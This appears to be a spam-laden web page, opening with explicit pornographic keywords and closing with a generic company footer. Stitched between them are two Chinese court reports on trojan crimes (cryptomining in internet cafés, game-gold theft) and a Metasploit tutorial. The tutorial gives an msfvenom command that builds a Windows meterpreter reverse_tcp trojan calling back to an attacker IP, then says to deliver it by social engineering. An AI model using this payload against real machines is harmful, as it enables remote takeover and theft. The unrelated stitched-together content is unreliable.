操屁眼的视频在线免费看,日本在线综合一区二区,久久在线观看免费视频,欧美日韩精品久久综

新聞資訊

    月25日,澎湃新聞(www.thepaper.cn)從杭州市下城區人民法院獲悉,該院日前對王某等3人非法控制計算機信息系統植入“木馬”用于互聯網“挖礦”牟利的案件進行一審判決,3人因非法控制計算機信息系統罪被判處有期徒刑三年六個月至四年不等并處相應罰金。

    “挖礦”是指用戶通過計算機硬件為比特幣等虛擬數字貨幣網絡開展數學運算的過程,提供服務的挖礦者可以得到一筆報酬,是獲取比特幣等數字貨幣的一種方式。“挖礦”對計算機運算能力要求較高,且耗電量較大。

    今年7月31日,杭州市公安局下城分局網警大隊接網吧營業主張某報案稱,他發現近幾個月網咖的電費猛漲,后發現其名下的兩家網吧內的150臺電腦疑似被人非法植入挖礦木馬進行比特幣“挖礦”操作。

    “挖礦木馬”則是由不法分子將挖礦機程序植入受害者的計算機中,利用受害者計算機的運算力進行挖礦的一種惡意程序,會在用戶不知情的情況下進行“挖礦”運算。

    警方勘驗分析發現,該3名男性嫌疑人涉嫌伙同他人,在浙江省內160多家網吧非法植入挖礦木馬。其中杭州115家,受害電腦臺數超過5000臺。3名嫌疑人的另一個身份竟是為受害網吧提供第三方維保服務公司的員工,在給電腦進行維保過程中,他們會偷偷在電腦里植入黑客木馬程序。

    法院審理查明,被告人王某名下的某網絡科技有限公司主要從事網吧計算機信息系統維護業務,先后與杭州市下城區、余杭區、江干區等地的100余家網吧簽署了維護協議。2017年12月起,王某與公司員工劉某、李某三人合謀,利用公司在系統維護中獲得的計算機控制權限,通過非法控制合作網吧計算機信息系統的方式為云計算平臺“挖礦”運算,從云計算平臺處獲利。

    下城法院審理認為,被告人王某、李某、劉某違反國家規定,對計算機信息系統實施非法控制,情節特別嚴重,其行為均已構成非法控制計算機信息系統罪,且系共同犯罪,遂依法作出判決:判處被告人王某有期徒刑四年、并處罰金2萬元,判處被告人劉某有期徒刑三年六個月、并處罰金1.5萬元,判處被告人李某有期徒刑三年六個月、并處罰金1.2萬元。

    報訊 近日,廣東省廣州市黃埔區人民法院一審依法宣判一起涉計算機犯罪案件,以非法控制計算機信息系統罪分別判處被告人顧某、楊某有期徒刑八個月、六個月二十一天,以提供非法控制計算機信息系統程序罪分別判處被告人梁某濤、梁某影有期徒刑六個月二十一天、六個月,并處罰金1.5萬元至7000元不等。

    2020年12月至今年2月,被告人梁某影提供其位于廣東省廉江市某住處的電腦給被告人梁某濤用于制作與儲存木馬程序。同案人“阿月”(另案處理)通過梁某影介紹以每月2000元的價格向梁某濤購買可以遠程控制他人電腦的木馬程序,并向梁某影支付款項。梁某影收到上述款項后,通過微信向梁某濤轉賬9000元。

    今年1月以來,被告人顧某、楊某與同案人“阿月”共謀在網絡游戲“魔獸世界懷舊服”中誘騙游戲玩家在電腦中點擊木馬程序,進而在遠程控制游戲玩家的電腦時,竊取游戲金幣。2月25日,被害人王某在筆記本電腦玩網絡游戲“魔獸世界懷舊服”時,顧某、楊某在該網絡游戲中通過語音聊天軟件向王某喊話,以付費組隊刷副本、包刷稀有游戲裝備為誘餌,誘騙王某用電腦鼠標點擊被偽裝成微信群二維碼的木馬程序文件,致使王某電腦系統感染木馬病毒。同案人“阿月”通過遠程操控王某的電腦游戲交易確認按鈕,將王某游戲賬戶內9萬個“魔獸世界”游戲金幣轉至顧某、楊某的游戲賬戶內。楊某通過交易平臺將游戲金幣兌換成人民幣5943.88元,并提現至其本人銀行卡。后王某報警。

    法院審理后認為,被告人顧某、楊某違反國家規定,伙同同案人對他人的計算機信息系統實行非法控制,情節嚴重,其行為均已構成非法控制計算機信息系統罪。被告人梁某濤、梁某影明知同案人購買木馬程序是為了控制他人的計算機,仍共同向同案人提供專門用于非法控制計算機信息系統的木馬程序,情節嚴重,其行為均已構成提供非法控制計算機信息系統程序罪。綜上,法院遂依法作出上述判決。案件宣判后,4名被告人當庭表示認罪服法。(向 陽 李 雪)

    ■法官說法■

    網絡不是法外之地。游戲幣作為一種虛擬資產,可在現實世界出售變現,具有明顯的價值屬性,同時其在被侵害時更難以發覺及挽回。通過控制計算機系信息系統盜取游戲幣的行為危害性并不因此低于傳統財產犯罪。民法典亦明確規定對數據、網絡虛擬財產的法律保護。本案中,被告人顧某、楊某侵犯了計算機信息系統的安全及公民財產權利,通過木馬病毒控制他人計算機來盜取游戲幣牟利,非法獲利超過5000元,達到情節嚴重標準,構成非法控制計算機信息系統罪。

    來源: 人民法院報

    、背景介紹

    Metasploit就是一個漏洞框架。它的全稱叫做The Metasploit Framework,簡稱叫做MSF。Metasploit作為全球最受歡迎的工具,不僅僅是因為它的方便性和強大性,更重要的是它的框架。它允許使用者開發自己的漏洞腳本,從而進行測試。Metasploit(msf)究竟威力如何呢?如何利用木馬控制受害者主機呢?接下來讓我們一起學習!


    二、資源裝備

    1.安裝好 Win7的虛擬機一臺

    2.整裝待發的小白一個。

    3.安裝好的Kali Linux虛擬機一臺。


    三、攻防實戰

    3.1 將受害者主機(Windows7)跟攻擊者主機(Kali Linux)的網絡模式全部設置為NAT模式,如下圖所示。

    步驟:打開虛擬機的設置/選擇網絡適配器/選擇NAT模式。


    3.2 利用攻擊者主機(kali linux)的相關工具(msfvenom)生成對應的木馬文件,如下圖所示。

    步驟1:msfvenom工具的參數介紹

    -p, –payload < payload> 指定需要使用的payload(攻擊荷載)。也可以使用自定義payload,幾乎是支持全平臺的

    -o, –out < path> 指定創建好的payload的存放位置。

    -h, –help 查看幫助選項。


    步驟2:msfvenom工具生成對應的木馬文件舉例,如下圖所示。


    步驟3:查看攻擊者主機的主機IP地址,如下圖所示。

    命令:ifconfig


    步驟4:利用msfvenom工具生成對應的木馬文件,如下圖所示。

    命令:msfvenom -p 指定需要使用的payload(攻擊荷載) lhost=攻擊者主機IP -f exe -o 生成木馬文件的保存位置

    例子:msfVenom -p windows/meterpreter/reverse_tcp lhost=192.168.78.144 -f exe -o /root/hk.exe


    步驟5:msfvenom工具生成木馬文件對應的命令運行結果如下圖所示。

    Saved as:生成的木馬文件保存路徑。


    步驟6:在已知的木馬文件保存路徑目錄下查找對應的木馬文件是否已經生成,如下圖所示,木馬文件已經存在(這里使用圖形化文件管理系統來查看,你也可以利用ls命令查看對應路徑下面是否已經生成對應的木馬文件)。


    3.3 利用一定的社會工程學方法將生成的木馬文件發送到目標受害者主機,并且在受害者主機進行運行(對應的社會工程學知識請持續關注本號,后續講解)

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有